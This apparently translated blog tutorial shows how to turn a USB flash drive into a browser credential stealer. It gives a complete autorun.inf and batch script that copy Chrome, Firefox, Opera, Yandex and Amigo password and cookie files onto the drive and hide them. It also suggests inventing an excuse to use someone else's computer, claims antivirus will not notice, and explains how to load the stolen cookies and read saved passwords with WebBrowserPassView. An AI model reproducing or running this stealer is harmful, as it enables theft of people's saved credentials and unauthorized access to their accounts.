How to create a cookie stealer from a flash drive
Never, under any circumstances, save passwords in the browser, today I'll tell you why.
We will look at a simple but effective way to quickly find out passwords, which, a careless user, and there are many of them, believe me, saved in the browser, it's so convenient, really, you don't need to remember the password, you don't need to enter it with pens every time, etc. . There are a lot of pluses, but there is one minus, and a big one, stealing such passwords is not a problem at all.
Today, we will quickly and without straining at all make a cookie stealer out of a simple flash drive, and then decrypt the cookies to find out all the passwords stored in the browser.
To begin with, you must understand what a cookie is, it is, in its own way, such an encrypted text document that stores basic information about the user.
But enough theory, let's get started.
On it we will create two text files:
do not forget to turn on the display of file extensions so that you can change txt to inf and bat, respectively, if suddenly someone didn’t guess)
further, in the autorun file we write: [AutoRun]Open=”stealer.bat”
[AutoRun]
everything, saved, closed. This is the autostart of our stealer
In the stealer.bat file we write:
@echo off md %~d0\Mozilla md %~d0\0pera md %~d0\Google md %~d0\Yandex md %~d0\Amigo CD/D %APPDATA%\Opera\Opera\ cls copy /y wand.dat %~d0\Opera\ copy /y cookies.dat %~d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %~d0\Mozilla copy /y key3.db %~d0\Mozilla copy /y signons.sqlite %~d0\Mozilla copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla cd %localappdata%\Google\Chrome\User Data\Default cls copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google" cd %localappdata%\Yandex\YandexBrowser\User Data\Default copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex" cd %localappdata%\Amigo\User Data\Default copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo" cls ATTRIB -R -A -S -H attrib +h %~d0\Mozilla attrib +h %~d0\Opera attrib +h %~d0\Google attrib +h %~d0\Yandex attrib +h %~d0\Amigo attrib +h %~d0\search.bat attrib +h %~d0\new attrib +h %~d0\autorun.inf del: autorun.inf?
also save, close. Then go to the properties of these files and make them hidden. Stiller is ready.
Now, it is worth dwelling on some nuances. Namely:
In Windows 10 (and 8), our autorun will not work, there this feature is tritely disabled. Therefore, you will have to come up with a way to get access to the computer and run the stealer.bat file manually, since the process takes very little time, and it doesn’t take much to come up with an excuse to sit down at someone else’s computer for a minute, right? On all previous versions of Windows, everything will happen by itself as soon as a person inserts a USB flash drive into the usb port.
The next nuance is that the antivirus will not react to this manipulation in any way, so you should not be afraid of the antivirus, but the firewall will block the whole thing for two times. It is important to understand here that the person who installed and configured the firewall understands something somewhere and certainly will not store passwords in the browser, such a character needs a more subtle approach, we will come up with in the next videos.
All in nuance. Now further, then we cut the cookie, what to do with them?
I'm telling. Already on your computer, ideally on a virtual machine, we delete our cookies. And we insert in their place those that we have on the flash drive. If suddenly someone does not know where the cookie is stored, here is a hint:
Google Chrome:
C:\Users\User\AppData\Local\Google\Chrome\User Data\Default (or Profile 1)\Cookies without extension
Opera:
C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Cookies
Mozilla Firefox:
C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\ cookie.sqlite
Internet Explorer 11: (Rip but still sharing :)
C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\
C:\Users\User\AppData\Roaming\Microsoft\Windows\Cookies\
Copied. Now download the WebBrowserPassView program and run it, that's it. We see on which sites what accounts and what passwords are there and use them for good and for security purposes)
And that’s about it, don’t forget that it’s worth complicating life with running batch files on someone else’s computer only if it’s really necessary, and in other cases (when possible) it’s easier to run WebBrowserPassView and see all the passwords right away.